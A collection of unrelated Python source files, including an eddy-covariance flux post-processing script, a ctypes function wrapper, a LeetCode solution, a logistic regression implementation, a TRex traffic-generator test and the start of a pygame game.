- flux error estimates using MDS after Lasslop et al. (Biogeosci, 2008)
The script is controlled by a config file in Python's standard configparser
format. The config file includes all possible parameters of used routines.
Default parameter values follow the package REddyProc where appropriate. See
comments in config file for details.
The script currently flags on input all NaN values and given *undefined*
values. Variables should be set to *undefined* in case of other existing flags
before calling the script. Otherwise it should be easy to set the appropriate
flags in the pandas DataFrame dff for the flags after its creation around line
160.
The output file can either have all flagged variables set to *undefined*
and/or can include flag columns for each variable (see config file).
Note, ustar filtering needs at least one full year.
Examples
--------
python postproc_europe-fluxdata.py hesseflux_example.cfg
History
-------
Written, Matthias Cuntz, April 2020
"""
from __future__ import division, absolute_import, print_function
import time as ptime
import sys
import configparser
import os.path
import datetime as dt
import numpy as np
import pandas as pd
import hesseflux as hf
#
# Find first elements in names that begin with elements of starts
def _findfirststart(starts, names):
"""
Find first elements in names that begin with elements of starts
Example
-------
>>> hout = _findfirststart(['TA', 'LE'],
['TIMESTAMP', 'TAU_1_1_1',
'H_1_1_1', 'LE_1_1_1',
'TA_1_1_1', 'TA_1_2_1', 'LE_PI_1_1_1'])
>>> print(hout)
TAU_1_1_1 LE_1_1_1
"""
hout = []
for hh in starts:
for cc in names:
if cc.startswith(hh):
hout.append(cc)
break
return hout
if __name__ == '__main__':
t1 = ptime.time()
# ToDo
# - Allow more flexibility in column names
# Read config file
if len(sys.argv) <= 1:
raise IOError('Input configuration file must be given.')
configfile = sys.argv[1]
config = configparser.ConfigParser(interpolation=None)
config.read(configfile)
# file path
outdir = config['GENERAL'].get('outdir', ".")
# program switches
outlier = config['POSTSWITCH'].getboolean('outlier', True)
ustar = config['POSTSWITCH'].getboolean('ustar', True)
partition = config['POSTSWITCH'].getboolean('partition', True)
fill = config['POSTSWITCH'].getboolean('fill', True)
fluxerr = config['POSTSWITCH'].getboolean('fluxerr', True)
# input file
eufluxfile = config['POSTIO'].get('inputfile', '')
timeformat = config['POSTIO'].get('timeformat', '%Y%m%d%H%M')
sep = config['POSTIO'].get('sep', ',')
skiprows = config['POSTIO'].get('skiprows', '')
undef = config['POSTIO'].getfloat('undef', -9999.)
swthr = config['POSTIO'].getfloat('swthr', 10.)
outputfile = config['POSTIO'].get('outputfile' '')
outundef = config['POSTSWITCH'].getboolean('outundef', True)
outflagcols = config['POSTSWITCH'].getboolean('outflagcols', False)
# mad
nscan = config['POSTMAD'].getint('nscan', 15)
nfill = config['POSTMAD'].getint('nfill', 1)
z = config['POSTMAD'].getfloat('z', 7)
deriv = config['POSTMAD'].getint('deriv', 2)
# ustar
ustarmin = config['POSTUSTAR'].getfloat('ustarmin', 0.1)
nboot = config['POSTUSTAR'].getint('nboot', 1)
plateaucrit = config['POSTUSTAR'].getfloat('plateaucrit', 0.95)
seasonout = config['POSTUSTAR'].getboolean('seasonout', False)
applyustarflag = config['POSTUSTAR'].getboolean('applyflag', False)
# gap-filling
sw_dev = config['POSTGAP'].getfloat('sw_dev', 50.)
ta_dev = config['POSTGAP'].getfloat('ta_dev', 2.5)
vpd_dev = config['POSTGAP'].getfloat('vpd_dev', 5.0)
longgap = config['POSTGAP'].getint('longgap', 60)
# partitioning
nogppnight = config['POSTPARTITION'].getboolean('nogppnight', False)
# ----------------------------------------------------------------
# Check call
# Assert iterable
if ',' in eufluxfile:
eufluxfile = eufluxfile.split(',')
eufluxfile = [ ee.strip() for ee in eufluxfile ]
else:
if eufluxfile:
eufluxfile = [eufluxfile]
else:
try:
eufluxfile = hf.files_from_gui(
initialdir='.', title='europe-fluxdata.eu file(s)')
except:
raise IOError("GUI for europe-fluxdata.eu file(s) failed.")
if skiprows == 'None':
skiprows = ''
if skiprows:
import json # to analyse int or list, tuple not working
skiprows = json.loads(skiprows.replace('(', '[').replace(')', ']'))
# ----------------------------------------------------------------
# Read input files into Panda data frame and check variable availability
print('Read data ', eufluxfile)
t01 = ptime.time()
# TIMESTAMP,TAU_1_1_1,H_1_1_1,LE_1_1_1,FC_1_1_1,...
# 201901010030,0.0941,-11.0765,-9999.0000,-9999.0000,...
# use lambda because of global var timeformat
parser = lambda date: dt.datetime.strptime(date, timeformat)
infile = eufluxfile[0]
df = pd.read_csv(infile, sep, skiprows=skiprows, parse_dates=[0],
date_parser=parser, index_col=0, header=0)
if len(eufluxfile) > 1:
for infile in eufluxfile[1:]:
df1 = pd.read_csv(infile, sep, skiprows=skiprows, parse_dates=[0],
date_parser=parser, index_col=0, header=0)
df = df.append(df1, sort=False)
df.fillna(undef, inplace=True)
# df.replace(-9999., np.nan, inplace=True)
# Flag
dff = df.copy(deep=True).astype(int)
dff[:] = 0
dff[df == undef] = 2
# dff[df.isna()] = 2
# day / night
isday = df['SW_IN_1_1_1'] > swthr
# Check Ta in Kelvin
hta = ['TA_']
hout = _findfirststart(hta, df.columns)
if df[hout[0]].max() < 100.:
tkelvin = 273.15
else:
tkelvin = 0.
# add tkelvin only where not flagged
df.loc[dff[hout[0]] == 0, hout[0]] += tkelvin
# add vpd if not given
hvpd = ['VPD']
hout = _findfirststart(hvpd, df.columns)
if len(hout) == 0:
hvpd = ['TA_', 'RH_']
hout = _findfirststart(hvpd, df.columns)
if len(hout) != 2:
raise ValueError('Cannot calculate VPD.')
ta_id = hout[0]
rh_id = hout[1]
if df[ta_id].max() < 100.:
tk = df[ta_id] + 273.15
else:
tk = df[ta_id]
if df[rh_id].max() > 10.:
rh = df[rh_id] / 100.
else:
rh = df[rh_id]
vpd = (1. - rh) * hf.esat(tk)
vpd_id = 'VPD_PI_1_1_1'
df[vpd_id] = vpd
df[vpd_id].where((df[ta_id] != undef) | (df[rh_id] != undef),
other=undef, inplace=True)
dff[vpd_id] = np.where((dff[ta_id] + dff[rh_id]) > 0, 2, 0)
df.loc[dff[vpd_id] == 0, vpd_id] /= 100.
# Check VPD in Pa
hvpd = ['VPD']
hout = _findfirststart(hvpd, df.columns)
if df[hout[0]].max() < 10.: # kPa
vpdpa = 1000.
elif df[hout[0]].max() < 100.: # hPa
vpdpa = 100.
else:
vpdpa = 1. # Pa
df.loc[dff[hout[0]] == 0, hout[0]] *= vpdpa
# time stepping
dsec = (df.index[1] - df.index[0]).seconds
ntday = np.rint(86400 / dsec).astype(np.int)
t02 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t02 - t01) / 60.)
if (t02 - t01) > 60.
else '[s]: {:d}'.format(int(t02 - t01)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Outlier detection
if outlier:
print('Spike detection')
t11 = ptime.time()
# assume *_PI variables after raw variables, e.g. LE before LE_PI,
# if available
houtlier = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE']
# houtlier = ['FC', 'NEE']
hout = _findfirststart(houtlier, df.columns)
print(' Using', hout)
# ToDo
# - only one call to mad for all variables
sflag = hf.madspikes(df[hout], flag=dff[hout], isday=isday,
undef=undef, nscan=nscan * ntday,
nfill=nfill * ntday, z=z, deriv=deriv, plot=False)
for ii, hh in enumerate(hout):
dff.loc[sflag[hh] == 2, hh] = 3
t12 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t12 - t11) / 60.)
if (t12 - t11) > 60.
else '[s]: {:d}'.format(int(t12 - t11)) )
print(' in ', strin)
# ----------------------------------------------------------------
# u* filtering
if ustar:
print('u* filtering')
t21 = ptime.time()
hfilt = ['NEE', 'USTAR', 'TA_']
hout = _findfirststart(hfilt, df.columns)
if len(hout) == 2: # take FC if NEE not in input file
hfilt = ['FC', 'USTAR', 'TA_']
hout = _findfirststart(hfilt, df.columns)
assert len(hout) == 3, 'Could not find CO2 flux (NEE or FC), USTAR or TA in input file.'
hout = _findfirststart(hfilt, df.columns)
print(' Using', hout)
ffsave = dff[hout[0]].to_numpy()
iic = np.where((~isday) & (df[hout[0]] < 0.))[0]
dff.iloc[iic, list(df.columns).index(hout[0])] = 4
ustars, flag = hf.ustarfilter(df[hout], flag=dff[hout],
isday=isday, undef=undef,
ustarmin=ustarmin, nboot=nboot,
plateaucrit=plateaucrit,
seasonout=seasonout,
plot=True)
dff[hout[0]] = ffsave
df = df.assign(USTAR_TEST_1_1_1=flag)
dff = dff.assign(USTAR_TEST_1_1_1=np.zeros(df.shape[0], dtype=np.int))
if applyustarflag:
# assume *_PI variables after raw variables, e.g. LE before LE_PI
# if available
hustar = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE']
hout = _findfirststart(hustar, df.columns)
print(' Using', hout)
for ii, hh in enumerate(hout):
dff.loc[flag == 2, hh] = 5
t22 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t22 - t21) / 60.)
if (t22 - t21) > 60.
else '[s]: {:d}'.format(int(t22 - t21)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Flux partitioning
if partition:
print('Flux partitioning')
t41 = ptime.time()
hpart = ['NEE', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hpart, df.columns)
if len(hout) == 3: # take FC if NEE not in input file
hpart = ['FC', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hpart, df.columns)
print(' Using', hout)
astr = 'Could not find CO2 flux (NEE or FC), SW_IN, TA, or VPD in input file.'
assert len(hout) == 4, astr
# nighttime method
print(' Nighttime partitioning')
dfpartn = hf.nee2gpp(df[hout], flag=dff[hout], isday=isday,
undef=undef, method='reichstein',
nogppnight=nogppnight)
if hout[0].startswith('NEE'):
suff = hout[0][3:-1]
else:
suff = hout[0][2:-1]
dfpartn.rename(columns=lambda c: c + suff + '1', inplace=True)
# daytime method
print(' Daytime partitioning')
dfpartd = hf.nee2gpp(df[hout], flag=dff[hout], isday=isday,
undef=undef, method='lasslop',
nogppnight=nogppnight)
dfpartd.rename(columns=lambda c: c + suff + '2', inplace=True)
df = pd.concat([df, dfpartn, dfpartd], axis=1)
# take flags from NEE
for dn in ['1', '2']:
for gg in ['GPP', 'RECO']:
dff[gg + suff + dn] = dff[hout[0]]
# flag if partitioning was not possible
for dn in ['1', '2']:
for gg in ['GPP', 'RECO']:
dff[df[gg + suff + dn] == undef] = 2
t42 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t42 - t41) / 60.)
if (t42 - t41) > 60.
else '[s]: {:d}'.format(int(t42 - t41)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Gap-filling
if fill:
print('Gap-filling')
t31 = ptime.time()
hfill = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
assert len(hout) == 3, 'Could not find SW_IN, TA or VPD in input file.'
# assume *_PI variables after raw variables, e.g. LE before LE_PI
# if available
hfill = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE',
'GPP_1_1_1', 'RECO_1_1_1',
'GPP_1_1_2', 'RECO_1_1_2',
'GPP_PI_1_1_1', 'RECO_PI_1_1_1',
'GPP_PI_1_1_2', 'RECO_PI_1_1_2',
'SW_IN', 'TA_', 'VPD']
# hfill = ['NEE', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
print(' Using', hout)
df_f, dff_f = hf.gapfill(df[hout], flag=dff[hout],
sw_dev=sw_dev, ta_dev=ta_dev, vpd_dev=vpd_dev,
longgap=longgap, undef=undef, err=False,
verbose=1)
hdrop = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hdrop, df.columns)
df_f.drop(columns=hout, inplace=True)
dff_f.drop(columns=hout, inplace=True)
def _add_f(c):
return '_'.join(c.split('_')[:-3] + ['f'] + c.split('_')[-3:])
df_f.rename(columns=_add_f, inplace=True)
dff_f.rename(columns=_add_f, inplace=True)
df = pd.concat([df, df_f], axis=1)
dff = pd.concat([dff, dff_f], axis=1)
t32 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t32 - t31) / 60.)
if (t32 - t31) > 60.
else '[s]: {:d}'.format(int(t32 - t31)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Error estimate
if fluxerr:
print('Flux error estimates')
t51 = ptime.time()
hfill = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
assert len(hout) == 3, 'Could not find SW_IN, TA or VPD in input file.'
# assume *_PI variables after raw variables, e.g. LE before LE_PI
# if available
hfill = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE',
'H_f', 'LE_f', 'FC_f',
'H_PI_f', 'LE_PI_f', 'NEE_f', 'NEE_PI_f',
'GPP_1_1_1', 'RECO_1_1_1',
'GPP_1_1_2', 'RECO_1_1_2',
'GPP_f_1_1_1', 'RECO_f_1_1_1',
'GPP_f_1_1_2', 'RECO_f_1_1_2',
'GPP_PI_1_1_1', 'RECO_PI_1_1_1',
'GPP_PI_1_1_2', 'RECO_PI_1_1_2',
'GPP_PI_f_1_1_1', 'RECO_PI_f_1_1_1',
'GPP_PI_f_1_1_2', 'RECO_PI_f_1_1_2',
'SW_IN', 'TA_', 'VPD']
# hfill = ['NEE', 'GPP', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
print(' Using', hout)
df_f = hf.gapfill(df[hout], flag=dff[hout],
sw_dev=sw_dev, ta_dev=ta_dev, vpd_dev=vpd_dev,
longgap=longgap, undef=undef, err=True, verbose=1)
hdrop = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hdrop, df.columns)
df_f.drop(columns=hout, inplace=True)
colin = list(df_f.columns)
# names such as: NEE_PI_err_1_1_1
df_f.rename(columns=_add_f, inplace=True)
colout = list(df_f.columns)
df = pd.concat([df, df_f], axis=1)
# take flags of non-error columns
for cc in range(len(colin)):
dff[colout[cc]] = dff[colin[cc]]
t52 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t52 - t51) / 60.)
if (t52 - t51) > 60.
else '[s]: {:d}'.format(int(t52 - t51)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Output
if not outputfile:
try:
outputdir = hf.directory_from_gui(initialdir='.',
title='Output directory')
except:
raise IOError("GUI for output directory failed.")
outputfile = configfile[:configfile.rfind('.')]
outputfile = outdir + '/' + os.path.basename(outputfile + '.csv')
print('Write output ', outputfile)
t61 = ptime.time()
# Back to original units
hta = ['TA_']
hout = _findfirststart(hta, df.columns)
df.loc[dff[hout[0]] == 0, hout[0]] -= tkelvin
hvpd = ['VPD']
hout = _findfirststart(hvpd, df.columns)
df.loc[dff[hout[0]] == 0, hout[0]] /= vpdpa
if outundef:
print(' Set flags to undef.')
for cc in df.columns:
if cc.split('_')[-4] != 'f': # exclude gap-filled columns
df[cc].where(dff[cc] == 0, other=undef, inplace=True)
if outflagcols:
print(' Add flag columns.')
def _add_flag(c):
return 'flag_' + c
dff.rename(columns=_add_flag, inplace=True)
# no flag columns for flags
dcol = []
for hh in dff.columns:
if '_TEST_' in hh:
dcol.append(hh)
if dcol:
dff.drop(columns=dcol, inplace=True)
df = pd.concat([df, dff], axis=1)
else:
print(' Add flag columns for gap-filled variables.')
occ = []
for cc in df.columns:
if cc.split('_')[-4] == 'f':
occ.append(cc)
dff1 = dff[occ].copy(deep=True)
dff1.rename(columns=lambda c: 'flag_' + c, inplace=True)
df = pd.concat([df, dff1], axis=1)
print(' Write.')
df.to_csv(outputfile, sep=sep, na_rep=str(undef), index=True,
date_format=timeformat)
t62 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t62 - t61) / 60.)
if (t62 - t61) > 60.
else '[s]: {:d}'.format(int(t62 - t61)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Finish
t2 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t2 - t1) / 60.)
if (t2 - t1) > 60.
else '[s]: {:d}'.format(int(t2 - t1)) )
print('Time elapsed', strin)
|
import ctypes
import os
import hashlib
from . import glue
from .dtype import DType, TemplateType, UnknownCType
def get_func_idcode(func_name, arg_types):
arg_types_str = ','.join([e.cname for e in arg_types])
idcode = '{func_name}:{arg_types_str}'.format(
func_name=func_name,
arg_types_str=arg_types_str)
return idcode
def get_idcode_hash(idcode):
sp = idcode.split(':')
func_name = sp[0]
md5 = hashlib.md5()
md5.update(idcode[len(func_name)+1:].encode('utf-8'))
return '{}_{}'.format(func_name, md5.hexdigest()[:8])
gpu_ctx_name = None
for gpu_ctx in ['cuda', 'hip']:
gpu_lib_fname = os.path.join(os.path.dirname(__file__), 'build',
'mobula_op_{}.so'.format(gpu_ctx))
if os.path.exists(gpu_lib_fname):
gpu_ctx_name = gpu_ctx
break
class CFuncDef:
def __init__(self, func_name, arg_names=[], arg_types=None, rtn_type=None,
template_list=[], loader=None, loader_kwargs=None):
self.func_name = func_name
self.arg_names = arg_names
self.arg_types = arg_types
self.rtn_type = rtn_type
self.template_list = template_list
self.loader = loader
self.loader_kwargs = loader_kwargs
def __call__(self, arg_datas, arg_types, dev_id):
if dev_id is None:
ctx = 'cpu'
dev_id = -1
else:
ctx = gpu_ctx_name
# function loader
func = self.loader(self, arg_types, ctx, **self.loader_kwargs)
return func(dev_id, *arg_datas)
class MobulaFunc:
"""An encapsulation for CFunction
"""
def __init__(self, name, func):
self.name = name
self.par_name = func.arg_names
self.par_type = func.arg_types
self.func = func
def __call__(self, *args, **kwargs):
def args_gen():
i = 0
for a in args:
yield a
i += 1
num_pars = len(self.par_name)
while i < num_pars:
yield kwargs[self.par_name[i]]
i += 1
# type check
arg_datas = []
dev_id = None
noncontiguous_list = []
temp_list = []
arg_types = []
template_mapping = dict()
def wait_to_read(var):
if hasattr(var, 'wait_to_read'):
var.wait_to_read()
def wait_to_write(var):
if hasattr(var, 'wait_to_write'):
var.wait_to_write()
def _var_wait(var, ptype):
if ptype.is_pointer:
if ptype.is_const:
# input
wait_to_read(var)
else:
# output
wait_to_write(var)
# Pre-process
for var, ptype in zip(args_gen(), self.par_type):
_var_wait(var, ptype)
def analyze_element(var, ptype, noncontiguous_list, template_mapping):
"""Analyze an element
Parameters
----------
var : variable
ptype : data type
noncontiguous_list : list
the list of noncontiguous variables
template_mapping : dict
the mapping from template name to ctype
"""
assert isinstance(ptype, (DType, TemplateType)),\
TypeError('Unknown Data Type: {}'.format(type(ptype)))
if ptype.is_pointer:
backend = glue.backend.get_var_backend(var)
data = backend.get_pointer(var)
if isinstance(data, (list, tuple)):
# data = (contiguous_array_pointer, contiguous_array_object)
if ptype.is_const:
temp_list.append(data[1]) # hold a reference
wait_to_read(data[1])
else:
noncontiguous_list.append((var, data[1]))
wait_to_write(data[1])
data = data[0]
dev_id = backend.dev_id(var)
ctype = ctypes.POINTER(backend.get_ctype(var))
if isinstance(ptype, DType):
expected_ctype = ptype.ctype
else:
if ptype.tname in template_mapping:
expected_ctype = template_mapping[ptype.tname]
else:
template_mapping[ptype.tname] = expected_ctype = ctype
assert ctype == expected_ctype,\
TypeError('Expected Type {} instead of {}'.format(
expected_ctype, ctype))
data = ctypes.cast(data, ctype)
else:
dev_id = None
if isinstance(ptype, TemplateType):
data = var
ctype = type(var) if hasattr(
var, '_type_') else UnknownCType(ptype.tname)
else:
data = var if isinstance(
var, ctypes.c_void_p) else ptype.ctype(var)
ctype = ptype.ctype
return data, dev_id, ctype
extra_pars = [noncontiguous_list, template_mapping]
for var, ptype in zip(args_gen(), self.par_type):
assert not isinstance(ptype, (list, tuple)),\
Exception('Not supported list or tuple as input variable now')
data, aid, ctype = analyze_element(var, ptype, *extra_pars)
arg_datas.append(data)
if isinstance(ctype, UnknownCType):
ctype.is_const = ptype.is_const
arg_types.append(ctype)
else:
arg_types.append(DType(ctype, is_const=ptype.is_const))
if aid is not None:
if dev_id is not None:
assert aid == dev_id, ValueError(
"Don't use multiple devices in a call :-(")
else:
dev_id = aid
# try to know the unknown ctype
for i, a in enumerate(arg_types):
if isinstance(a, UnknownCType):
assert a.tname in template_mapping,\
Exception('Unknown template name: {}'.format(a.tname))
ctype = template_mapping[a.tname]._type_
arg_types[i] = DType(ctype, a.is_const)
arg_datas[i] = ctype(arg_datas[i])
rtn = self.func(arg_datas=arg_datas,
arg_types=arg_types,
dev_id=dev_id)
for source, target in noncontiguous_list:
source[:] = target
return rtn
def build(self, ctx, template_types=[]):
"""Build this function
Parameters
----------
ctx: str
context Name
template_types: list or tuple or dict, default: []
list:
a list of template type Names
tuple:
a tuple of template type Names
dict:
a mapping from template name to type name
Examples:
mobula.func.add.build('cpu', ['float'])
"""
arg_types = []
if isinstance(template_types, (list, tuple)):
template_mapping = dict() # tname -> ctype
for t in self.par_type:
if isinstance(t, TemplateType):
tname = t.tname
if tname in template_mapping:
ctype = template_mapping[tname]
else:
ctype = getattr(ctypes, 'c_{}'.format(
template_types.pop(0)))
template_mapping[tname] = ctype
arg_types.append(t(ctype))
else:
arg_types.append(t)
assert not template_types, Exception('redundant type')
else:
assert isinstance(template_types, dict), TypeError(
'The type of template_types should be list or tuple or dict.')
template_name = set()
for t in self.par_type:
if isinstance(t, TemplateType):
tname = t.tname
assert tname in template_types, KeyError(
'Unknown Template Type: {}'.format(tname))
template_name.add(tname)
ctype = getattr(ctypes, 'c_{}'.format(
template_types[tname]))
arg_types.append(t(ctype))
else:
arg_types.append(t)
assert len(template_name) == len(template_types), Exception(
'Different template name: {} vs {}'.format(template_name, set(template_types.keys())))
func = self.func
func.loader(func, arg_types, ctx, **func.loader_kwargs)
def bind(functions):
for k, func in functions.items():
assert k not in globals(), "Duplicated function name %s" % k
globals()[k] = MobulaFunc(k, func)
|
# 53. Maximum Subarray
# --------------------
#
# Given an integer array `nums`, find the contiguous subarray (containing at least one number) which has the largest
# sum and return *its sum*.
#
# ### Constraints:
#
# * `1 <= nums.length <= 3 * 10^4`
# * `-10^5 <= nums[i] <= 10^5`
#
# **Follow up:** If you have figured out the `O(n)` solution, try coding another solution using the **divide and
# conquer** approach, which is more subtle.
from typing import List
from collections import namedtuple
IntervalValue = namedtuple('IntervalValue', 'optimal left_suboptimal right_suboptimal total')
def singleton(num):
return IntervalValue(num, num, num, num)
def combine(lhs, rhs):
return IntervalValue(
optimal = max(lhs.optimal, lhs.left_suboptimal + rhs.right_suboptimal, rhs.optimal),
left_suboptimal = max(lhs.left_suboptimal + rhs.total, rhs.left_suboptimal),
right_suboptimal = max(lhs.right_suboptimal, lhs.total + rhs.right_suboptimal),
total = lhs.total + rhs.total
)
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
def recur(start, end):
if end - start == 1:
return singleton(nums[start])
middle = (start + end) // 2
lhs = recur(start, middle)
rhs = recur(middle, end)
return combine(lhs, rhs)
if not nums:
return 0
return recur(0, len(nums)).optimal
if __name__ == '__main__':
s = Solution()
# Example 1:
#
# Input: nums = [-2,1,-3,4,-1,2,1,-5,4]
# Output: 6
# Explanation: [4,-1,2,1] has the largest sum = 6.
print(f"{s.maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4])} == 6")
# Example 2:
#
# Input: nums = [1]
# Output: 1
print(f"{s.maxSubArray([1])} == 1")
# Example 3:
#
# Input: nums = [5,4,-1,7,8]
# Output: 23
print(f"{s.maxSubArray([5, 4, -1, 7, 8])} == 23") |
def inclusiveFor(*args):
argsNum = len(args)
start = 0
step = 1
stop = 0
if argsNum == 0:
raise TypeError(f'Expected at least one argument. Found {argsNum}')
elif argsNum == 1:
stop = args[0]
elif args[0] > args[1]:
raise TypeError(f'Starting position should be less than or equal to the range.')
elif argsNum == 2:
(start, stop) = args
elif argsNum == 3:
(start, stop, step) = args
else:
raise TypeError(f'Expected up to three arguments. Found {argsNum}')
i = start
while i <= stop:
yield i
i += step
for i in inclusiveFor(22, 22, 3):
print(i, end=' ', flush=True)
|
"""
Logistic Regression (Stochastic Gradient Descent) implemented in Python
Χ: input data
y: target value
y_hat: prediction
w: weights
b: bias
"""
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
class LogReg():
def __init__(self,X,y,iters=1000, batch_size=32, learning_rate=10):
self.X = X
self.y = y
self.m,self.n = self.X.shape # m: training examples, n:number of features
self.learning_rate = learning_rate
self.batch_size = batch_size
self.iters = iters
def sigmoid(self, x):
z = 1/(1+np.exp(-x))
return z
def cost_function(self, y, y_hat):
cost = (np.dot((-y.T), np.log(y_hat)) - np.dot((1-y).T, np.log(1-y_hat))) / self.m
return cost
def grads(self, X, y, y_hat):
# Gradient of weights
dw = (1/self.m)*np.dot(X.T, (y_hat - y))
# Gradient of bias
db = (1/self.m)*np.sum((y_hat - y))
return dw, db
def fit(self):
#initialize weights and bias with zero
self.w = np.zeros((self.n,1))
self.b = 0
#reshape y
self.y = self.y.reshape(self.m,1)
#normalize X
self.X = self.X / np.linalg.norm(self.X)
#split data in batches
X_batch = np.array_split(self.X, self.batch_size)
y_batch = np.array_split(self.y, self.batch_size)
losses = []
for epoch in range(self.iters):
for i,x_batch in enumerate(X_batch):
y_hat = self.sigmoid(np.dot(x_batch,self.w) + self.b)
dw,db = self.grads(x_batch, y_batch[i], y_hat)
#update parameters
self.w -= self.learning_rate * dw
self.b -= self.learning_rate * db
cost = self.cost_function(self.y, self.sigmoid(np.dot(self.X, self.w) + self.b))
losses.append(cost)
return losses
def predict(self,X):
#normalize X
X = X / np.linalg.norm(X)
preds = self.sigmoid(np.dot(X,self.w) + self.b)
predictions = [1 if pred>0.5 else 0 for pred in preds]
return predictions
if __name__ == '__main__':
X, y = make_classification(n_samples=10000,n_features=5, n_redundant=0,
n_informative=2, random_state=1,
n_clusters_per_class=1)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size = 0.3, random_state=7)
LR = LogReg(X_train, y_train)
LR.fit()
y_pred = LR.predict(X_test)
print(classification_report(y_test,y_pred))
|
import stl_path
from trex.stl.api import *
from pprint import pprint
import time
import re
import random
class DynamicProfileTest:
def __init__(self,
client,
streams,
min_rand_duration,
max_rand_duration,
min_tick,
max_tick,
duration,
rate
):
self.rate =rate
self.c = client
self.streams = streams
self.min_rand_duration = min_rand_duration
self.max_rand_duration = max_rand_duration
self.min_tick = min_tick
self.max_tick = max_tick
self.duration = duration
def is_profile_end_msg(self,msg):
m = re.match(r"Profile (\d+).profile_(\d+) job done", msg)
if m:
return [int(m.group(1)),int(m.group(2))]
else:
return None
def build_profile_id (self,port_id,profile_id):
profile_name = "{}.profile_{}".format(port_id,profile_id)
return profile_name
def build_streams (self):
streams_all = []
packet = (Ether() /
IP(src="16.0.0.1",dst="48.0.0.1") /
UDP(sport=1025,dport=1025) /
Raw(load='\x55' * 10)
)
for o in range(0,self.streams):
s1 = STLStream(packet = STLPktBuilder(pkt = packet),
mode = STLTXCont())
streams_all.append(s1)
return (streams_all)
def run_test (self):
passed = True
c = self.c;
try:
# connect to server
c.connect()
# prepare our ports
c.reset(ports = [0])
port_id = 0
profile_id = 0
tick_action = 0
profiles ={}
tick = 1
max_tick = self.duration
stop = False
c.clear_stats()
c.clear_events();
while True:
if tick > tick_action and (tick<max_tick):
profile_name = self.build_profile_id(port_id,profile_id)
duration = random.randrange(self.min_rand_duration,self.max_rand_duration)
stream_ids = c.add_streams(streams = self.build_streams(), ports = [profile_name])
profiles[profile_id] = 1
print(" {} new profile {} {} {}".format(tick,profile_name,duration,len(profiles)) )
c.start(ports = [profile_name], mult = self.rate, duration = duration)
profile_id += 1
tick_action = tick + random.randrange(self.min_tick,self.max_tick) # next action
time.sleep(1);
tick += 1
# check events
while True:
event = c.pop_event ()
if event == None:
break;
else:
profile = self.is_profile_end_msg(event.msg)
if profile:
p_id = profile[1]
assert(profiles[p_id]==1)
del profiles[p_id]
print(" {} del profile {} {}".format(tick,p_id,len(profiles)))
if tick>=max_tick and (len(profiles)==0):
print("stop");
stop=True
if stop:
break;
r = c.get_profiles_with_state("active")
print(r)
assert( len(r) == 0 )
stats = c.get_stats()
diff = stats[1]["ipackets"] - stats[0]["opackets"]
print(" diff {} ".format(diff))
assert(diff<2)
except STLError as e:
passed = False
print(e)
finally:
c.disconnect()
if c.get_warnings():
print("\n\n*** test had warnings ****\n\n")
for w in c.get_warnings():
print(w)
if passed and not c.get_warnings():
return True
else:
return False
def simple_multi_burst (server):
c = STLClient(server = server)
test = DynamicProfileTest(c,100,1,50,1,2,20,"10kpps");
print(test.run_test())
simple_multi_burst ("csi-kiwi-02")
|
import pygame
from random import randint
pygame.init()
if __name__ == '__main__':
#func
def move_with_arrows(x, speed):
keys = pygame.key.get_pressed() #checking pressed keys
if keys[pygame.K_RIGHT]:
x += speed
if keys[pygame.K_LEFT]:
x -= speed
return x
playerIMG = pygame.image.load('img\\player.png')
objectIMG = pygame.image.load('img\\object.png')
grassIMG = pygame.image.load('img\\grass.png')
icon = pygame.image.load('img\\icon.ico')
def player(x, y, size):
screen.blit(playerIMG,(x,y))
#pygame.draw.rect(screen, BLUE, [x, y, size, size],0)
def Object(x, y, size):
screen.blit(objectIMG,(x,y))
#pygame.draw.rect(screen, RED, [x, y, size, size],0)
def draw_text(text, font_name, size, color, x, y):
'''This is an edited function from:
https://stackoverflow.com/questions/20842801/how-to-display-text-in-pygame
It is used to make text appear on the screen.
'''
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, color)
screen.blit(text_surface, dest=(x,y))
# Define some colors
BLACK = ( 0, 0, 0)
WHITE = ( 255, 255, 255)
GREEN = ( 0, 255, 0)
RED = ( 255, 0, 0)
GRAY = (100, 100, 100)
BLUE = (0, 0, 255)
LIGHTBLUE = (130, 182, 236)
# Open a new window
size = (800, 600)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Dodge Ball! 1.0")
pygame.display.set_icon(icon)
psize = 50
default_pspeed = 5
pspeed = default_pspeed
player_speed_increase = True
px = size[0]/2
allow_movement = True
osize = 50
rx = randint(0, size[0]-osize)
ry = randint(osize, size[1]/3)
i=0
speeduprate=10
sur=speeduprate
default_speed = 5
speed=default_speed
object_player_collisions=True
debug = False
collision=False
carryOn = True
clock = pygame.time.Clock()
while carryOn:
for event in pygame.event.get():
if event.type == pygame.QUIT:
carryOn = False
